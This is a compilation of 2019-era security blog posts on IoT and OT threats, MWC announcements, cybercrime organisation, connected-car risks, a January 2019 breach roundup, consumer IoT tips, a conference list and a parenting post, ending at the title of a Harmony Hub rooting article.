      In a keynote address at the RSA Conference in San Francisco, Matt Watchinski, the vice president of Cisco Talos, said the growing prevalence of these devices has made them an urgent priority to protect them from attackers. Liz Centoni, the senior vice president of Cisco’s IoT (internet-of-things) Business Group, presented along with Watchinski.

      “These technologies will make it into our critical infrastructure; they’ll make their way into how we deliver water and power,” he said during the address. “We have achieved so much in IT security. We are now going to have to learn a completely different world of OT [operational technology] security."

      One of the most notable and recent IoT security attacks was VPNFilter, which Talos exposed last May. Talos researchers, working with public and private-sector threat intelligence partners and law enforcement, discovered malware infecting hundreds of thousands of networking devices worldwide, ready to act as a “kill switch” to take these devices offline at a moment’s notice.

      Watchinski said VPNFilter is a well-known and well-publicized example, but there are many other daily, systemic attacks the public isn’t aware of that could disrupt daily services people need to live, such as electricity, oil and water.

      Many companies are unprepared to defend against these kinds of attacks. Watchinski and Centoni reiterated that IT and OT teams need to work together to shield any device that connects to the Internet. Centoni said many Cisco customers are unaware of up to 40 or 50 percent of the devices on their network.

      “Security is the reason IT and OT teams are forced to work together,” she said. “Today they work in different worlds.”

      Centoni gave an analogy to group existing technology into two different spaces: carpeted and non-carpeted.

      The traditional devices in carpeted environments, such as routers, switches and endpoints, are already well-secured thanks to the work of security researchers and in-house IT teams.

      But other devices, even oil pipelines, parking meters and electric scooters, connect to those same networks in non-carpeted spaces, meaning they exist out in the open. These devices are most at risk because IT teams aren’t currently paying close attention to them.

      Centoni explained the need for security to be baked into the DNA of OT. Once implemented, OT systems usually don’t get upgraded for decades, so security has to be a fundamental part of the original design.

      For more coverage of Cisco’s keynote at RSA, check out live tweets during the event below. You can also watch a recording of the presentation here. And for more of what to expect from Talos at RSA, listen to the latest Beers with Talos podcast here.

      What MWC 2019 Shows Us About the Future of Connectivity

      The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

      Foldable Phones Are the Future

       MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it encloses like a book. Although neither of these devices are available at to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

      Smart Home Technology Goes Mobile

       Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

      Enhancing the Gaming Experience with 5G, VR, and AR

      Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersed gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Uniteapp, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each players’ phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.

      Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.

      Bringing 4G and 5G to the Automotive Industry

      Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

      Securing Consumers On-the-Go

      The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

      And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part of help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

      While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

      To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

      The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

      Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

      We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

      Mobile Connectivity and the Evolving Threat Landscape

      These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

      Growing Partnerships to Protect What Matters

      Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

      We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

      We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

      To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

      The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

      The Business of Organised Cybercrime

      Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

      Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

      Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

      There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

      Current perceptions surrounding Cybergangs

      Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

      This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

      How Cybergangs are using Technology to Work Smarter and Cheaper

      Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

      The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

      IoT Vulnerabilities on the Rise
      According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

      Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

      Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

      Why Cybersecurity Mindsets must Change

      IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

      To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

      It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

      Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

      In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.

      Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
      David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.

      Automotive Technologies and Cyber Security

      A guest article authored by Giles Kirkland
      Giles is a car expert and dedicated automotive writer with a great passion for electric vehicles, autonomous cars and other innovative technologies. He loves researching the future of motorisation and sharing his ideas with auto enthusiasts across the globe. You can find him on Twitter, Facebook and at Oponeo.


      Automotive Technologies and Cyber Security
      Surveys show that about 50% of the UK feel that driverless vehicles will make their lives much easier and are eagerly anticipating the arrival of this exciting technology. Cities expect that when driverless car technology is fully implemented, the gridlock which now plagues their streets will be relieved to a large extent. Auto-makers predict that the new technology will encourage a surge in vehicle purchases, and technology companies are lining up with the major auto manufacturers to lend their experience and knowledge to the process, hoping to earn huge profits.



      Delays to Driverless Technology
      While some features of autonomous technology have already been developed and have been rolled out in various new vehicles, the full technology will probably not be mature for several decades yet. One of the chief holdups is in establishing the infrastructure necessary on the roads themselves and in cities, in order to safely enable driverless operation.

      The full weight of modern technology is pushing development along at a breakneck pace. Unlike safety testing of the past, where some real-life scenarios were simulated to anticipate vehicle reactions, high-powered simulators have now been setup to increase the rapidity at which vehicle software can 'learn' what to do in those real-life situations. This has enabled learning at a rate exponentially greater than any vehicle of the past, which is not surprising, since vehicles of the past were not equipped with 'brains' like autonomous cars will be.

      The Cyber Security aspect of Autonomous Vehicles
      Despite the enormous gains that will come from autonomous vehicles, both socially and economically, there will inevitably be some problems which will arise, and industry experts agree that the biggest of these threats is cyber security. In 2015, there was a famous incident which dramatically illustrated the possibilities. In that year, white-collar hackers took control of a Jeep Cherokee remotely by hacking into its Uconnect Internet-enabled software, and completely cut off its connection with the Internet. This glaring shortcoming caused Chrysler to immediately recall more than one million vehicles, and provided the world with an alarming illustration of what could happen if someone with criminal intent breached the security system of a vehicle.

      Cars of today have as many as 100 Electronic Control Units (ECU's), which support more than 100 million coding lines, and that presents a huge target to the criminal-minded person. Any hacker who successfully gains control of a peripheral ECU, for instance the vehicle's Bluetooth system, would theoretically be able to assume full control of other ECU's which are responsible for a whole host of safety systems. Connected cars of the future will of course have even more ECU's controlling the vehicle's operations, which will provide even more opportunities for cyber attack.


      Defense against Cyber Attacks
      As scary as the whole cyber situation sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason for thinking that the threat can be managed effectively. There are numerous companies already involved in research and development on how to make cars immune from attacks, using a multi-tiered defense system involving several different security products, installed on different levels of the car's security system.

      Individual systems and ECU's can be reinforced against attacks. Up one level from that, software protection is being developed to safeguard the vehicle's entire internal network. In the layer above that, there are already solutions in place to defend vehicles at the point where ECU's connect to external sources. This is perhaps the most critical area, since it represents the line between internal and external communications. The final layer of security comes from the cloud itself. Cyber threats can be identified and thwarted before they are ever sent to a car.

      The Cyber Security Nightmare
      If you ask an average person in the UK what the biggest problem associated with driverless cars is, they’d probably cite the safety issue. Industry experts however, feel that once the technology has been worked out, there will probably be less highway accidents and that driving safety will actually be improved. However, the nightmare of having to deal with the threat which always exists when anything is connected to the Internet, will always be one which is cause for concern.

      Cyber Security Roundup for January 2019

      The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

      B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included: the first and last names of individuals caught or suspected of stealing goods from stores descriptions of the people involved, their vehicles and other incident-related information the product codes of the goods involved the value of the associated loss.

      Hundreds of German politicians, including Chancellor Angela Merkel, have had personal details stolen and published online at the start of January.  A 20 year suspect was later arrested in connection to this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

      Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
      Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

      The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

      Security company ForeScout said it had found thousands of vulnerable devices using search engines Shodan and Cenys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control over after it developed its own proof-of-concept malware.

      Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password invoke by Reddit in response. A Reddit admin said "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access."

      Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

      A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email attack made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

      January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


      BLOG
      NEWS
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE
      REPORTS

      How to Protect Three Common IoT Devices in 2019

      It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead, and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.

      Routers

      Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.

      Gaming Systems

      Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involved with the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. Through exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes.  This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be weary of what you click on.

      Voice Tech

      In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely due to what we enable them to be connected with for convenience; delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information.  Because voice-controlled devices are frequently distributed without proper security protocol in place, they are the perfect vehicle in terms of executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.

      While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:

      • Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
      • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
      • Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as opening the box. By changing the factory settings you’re instantly upgrading your device’s security.
      • Use best practices for linked accounts.  For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
      • Setup a separate IoT network. Consider setting up a second network for your IoT devices that don’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding in another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
      • Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a Firewall is included to ensure that your devices are protected.
      • Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with McAfee Gamer Security, Beta, it’s free!

      Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

      The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

      Cyber Security Conferences to Attend in 2019

      A list of Cyber and Information Security conferences to consider attending in 2019. Conference are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but to network with industry leading security professionals and likeminded enthusiasts, to share ideas, expand your own knowledge, and even to make good friends.

      JANUARY 2019

      SANS Cyber Threat Intelligence Summit
      Monday 21st & Tuesday 22nd January 2019
      Renaissance Arlington Capital View Hotel, VA, USA
      https://www.sans.org/event/cyber-threat-intelligence-summit-2018


      AppSec California 2019 (OWASP)
      Tuesday 22nd & Wednesday 23rd January 2019
      Annenberg Community Beach House, Santa Monica, USA
      https://2019.appseccalifornia.org/


      PCI London
      Thursday 24th January 2019
      Park Plaza Victoria Hotel, London, UK
      https://akjassociates.com/event/pcilondon

      The Future of Cyber Security Manchester
      Thursday 24th January 2019
      Bridgewater Hall, Manchester, UK
      https://cybermanchester.events/

      BSides Leeds
      Friday 25th January 2019
      Cloth Hall Court, Leeds, UK
      FEBRUARY 2019
      Cyber Security for Industrial Control Systems

      Thursday 7th & Friday 8th February 2019
      Savoy Place, London, UK
      https://events.theiet.org/cyber-ics/index.cfm

      NOORD InfoSec Dialogue UK
      Tuesday 26th & Wednesday 27th February 2019
      The Bull-Gerrards Cross, Buckinghamshire, UK

      MARCH 2019
      RSA Conference
      Monday 4th to Friday 8th March 2019
      At Moscone Center, San Francisco, USA
      https://www.rsaconference.com/events/us19

      17th Annual e-Crime & Cybersecurity Congress
      Tuesday 5th & Wednesday 6th March 2019
      Park Plaza Victoria

      Security & Counter Terror Expo
      Tuesday 5th & Wednesday 6th March 2019
      Olympia, London, UK
      https://www.counterterrorexpo.com/


      ISF UK Spring Conference
      Wednesday 6th & Thursday 7th March 2019
      Regent Park, London, UK
      https://www.securityforum.org/events/chapter-meetings/uk-spring-conference-london/


      BSidesSF
      Sunday 3rd and Monday 4th March 2019
      City View at Metreon, San Francisco, USA
      https://bsidessf.org/

      Cloud and Cyber Security Expo
      Tuesday 12th to Wednesday 13 March 2019
      At ExCel, London, UK
      https://www.cloudsecurityexpo.com/

      APRIL 2019

      (ISC)2 Secure Summit EMEA
      Monday 15th & Tuesday 16th April 2019
      World Forum, The Hague, Netherlands
      https://web.cvent.com/event/df893e22-97be-4b33-8d9e-63dadf28e58c/summary

      Cyber Security Manchester
      Wednesday 3rd & Thursday 4th April 2019
      Manchester Central, Manchester, UK
      https://cybermanchester.events/

      BSides Scotland 2019
      Tuesday 23rd April 2019
      Royal College of Physicians, Edinburgh, UK
      https://www.contextis.com/en/events/bsides-scotland-2019


      CyberUK 2019
      Wednesday 24th & Thursday 25th April 2019
      Scottish Event Campus, Glasgow, UK
      https://www.ncsc.gov.uk/information/cyberuk-2019

      Cyber Security & Cloud Expo Global 2019
      Thursday 25th and Friday 29th April 2019
      Olympia, London, UK
      https://www.cybersecuritycloudexpo.com/global/


      JUNE 2019
      Infosecurity Europe 2019
      Tuesday 4th to Thursday 6th June 2019
      Where Olympia, London, UK
      https://www.infosecurityeurope.com/

      BSides London

      Thursday 6th June 2019
      ILEC Conference Centre, London, UK
      https://www.securitybsides.org.uk/

      Blockchain International Show
      Thursday 6th and Friday 7th June 2019
      ExCel Exhibition & Conference Centre, London, UK
      https://bisshow.com/

      Hack in Paris 2019
      Sunday 16th to Friday 20th June 2019
      Maison de la Chimie, Paris, France
      https://hackinparis.com/

      UK CISO Executive Summit
      Wednesday 19th June 2019
      Hilton Park Lane, London, UK
      https://www.evanta.com/ciso/summits/uk#overview

      Cyber Security & Cloud Expo Europe 2019
      Thursday 19th and Friday 20th June 2019
      RIA, Amsterdam, Netherlands
      https://cybersecuritycloudexpo.com/europe/

      Gartner Security and Risk Management Summit
      Monday 17th to Thursday 20th June 2019
      National Harbor, MD, USA
      https://www.gartner.com/en/conferences/na/security-risk-management-us

      European Maritime Cyber Risk Management Summit
      Tuesday 25th June 2019
      Norton Rose Fulbright, London, UK


      AUGUST 2019
      Black Hat USA
      Saturday 3rd to Thursday 8th August 2019
      Mandalay Bay, Las Vegas, NV, USA
      https://www.blackhat.com/upcoming.html

      DEF CON 27

      Thursday 8th to Sunday 11th August 2019
      Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA
      https://www.defcon.org/


      SEPTEMBER 2019
      44Con
      Wednesday 11th to Friday 13th September 2019
      ILEC Conference Centre, London, UK
      https://44con.com/

      2019 PCI SSC North America Community Meeting
      Tuesday 17th to Thursday 19th September 2019
      Vancouver, BC, Canada
      https://www.pcisecuritystandards.org/about_us/events

      OCTOBER 2019

      Hacker Halted
      Thursday 10th & Friday 11th October 2019
      Atlanta, Georgia, USA
      https://www.hackerhalted.com/

      BruCON
      Thursday 10th & Friday 11th October 2019
      Aula, Gent, Belgium
      https://www.brucon.org/2019/

      EuroCACS/CSX (ISACA) 2019

      Wednesday 16th to Friday 19th October 2019
      Palexpo Convention Centre, Geneva, Switzerland
      https://conferences.isaca.org/euro-cacs-csx-2019

      6th Annual Industrial Control Cyber Security Europe Conference
      Tuesday 29th and Wednesday 30th October 2019
      Copthorne Tara, Kensington, London, UK
      https://www.cybersenate.com/new-events/2018/11/13/6th-annual-industrial-control-cyber-security-europe-conference

      2019 PCI SSC Europe Community Meeting

      Tuesday 22nd to Thursday 24th October 2019
      Dublin, Ireland
      https://www.pcisecuritystandards.org/about_us/events

      ISF 30th Annual World Congress
      Saturday 26th to Tuesday 29th October 2019
      Convention Centre Dublin, Dublin, Ireland



      NOVEMBER 2019
      Cyber Security & Could Expo North America 2019
      Wednesday 13th and Thursday 14th November 2019
      Santa Clara Convention Centre, Silicon Valley, USA
      https://www.cybersecuritycloudexpo.com/northamerica/

      DevSecCon London 
      Thursday 14th & Friday 15th November 2019
      CodeNode, London, UK


      Cyber Security Summit 2019
      Wednesday 20th November 2019
      QEII Centre, London, UK
      https://cybersecuritysummit.co.uk/

      2019 PCI SSC Asia-Pacific Community Meeting 

      Wednesday 20th and Thursday 21st November 2019
      Melbourne, Australia
      https://www.pcisecuritystandards.org/about_us/events

      DeepSec
      Thursday 20th to Saturday 30th November 2019
      The Imperial Riding School Vienna, Austria
      https://deepsec.net/

      Post in the comments about any cyber & information security themed conferences or events you recommend.

      The #1 Gift Parents Can Give Their Kids This Christmas

      quality time with kidsYou won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

      Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

      If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

      So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to it’s hiding place and reconnect to the moment.

      This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

      Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

      Here are a few ideas to inspire you forward:

      1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.quality time with kids
      2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
      3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
      4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
      5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

      Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

      The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

      Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World

      Introduction

